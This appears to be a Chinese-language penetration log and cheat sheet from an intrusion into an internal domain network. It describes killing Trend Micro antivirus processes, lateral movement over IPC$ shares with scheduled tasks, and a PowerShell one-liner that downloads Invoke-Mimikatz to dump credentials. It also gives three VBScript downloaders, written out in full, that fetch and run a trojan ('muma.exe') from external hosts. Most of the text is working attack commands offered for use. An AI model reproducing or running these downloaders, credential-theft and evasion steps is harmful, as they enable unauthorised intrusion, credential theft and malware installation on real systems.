渗透总结:
环境为172段,拿到shell,补丁全打,站库分离,360分分钟教我做人,上了个大马,net一套命令下来,有域,恰好库在域这个段,此时我想通过mssql执行cmdshell种马(其实通过mssql已经拿到几台服务器了。但是感觉用shell去访问不行)
vbs下载者,bitsadmin下载,ipc链接copy过去,
1.bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:p.zip win03下没有,拷贝win7过去不能使用。
2.vbs下载者 我echo执行所有命令,发现执行超时。趋势科技防火墙,我用system权限,taskkill /f /t /im pid结束进程,结果关闭掉了mssql进程(手误)
大概有四个进程:
NTRtScan.exe 1964 ntrtscan
PccNTMon.exe 3924 暂缺
CNTAoSMgr.exe 296 暂缺
PccNTMon.exe 5452 暂缺
ipc net use \10.1.111.1c$ "dcusername" /user:"password"
copy pathxx.exe \10.xxxxc$xx.exe
net time \ip
at time \ipC$x.exe (典型的手法)
接下来的思路:
查看shell进行提权,溢出,mssql,ftp,收集更多的信息,比如mail等
确定控下的这两天内网机器是否存在web,如果是这样就很轻松了。
msf+cobalt strike+veil提权看看
powershell 抓密码:
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:programdatapass.txt"
执行命令:psexec
https://technet.microsoft.com/en-us/sysinternals/bb897553
https://github.com/nick-o/impacket
vbs下载三种版本:
一、VBS下载者:
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.03389.com/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:zl.exe",2
wscript.sleep 1000
Shell.Run ("c:zl.exe") '延迟过后执行下载文件
二、cmd下执行的版本:
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.03389.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:zl.exe") >>zl.vbs
三、wget.vbs
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
使用方法:cscript wget.vbs http://www.moonsec.com/muma.exe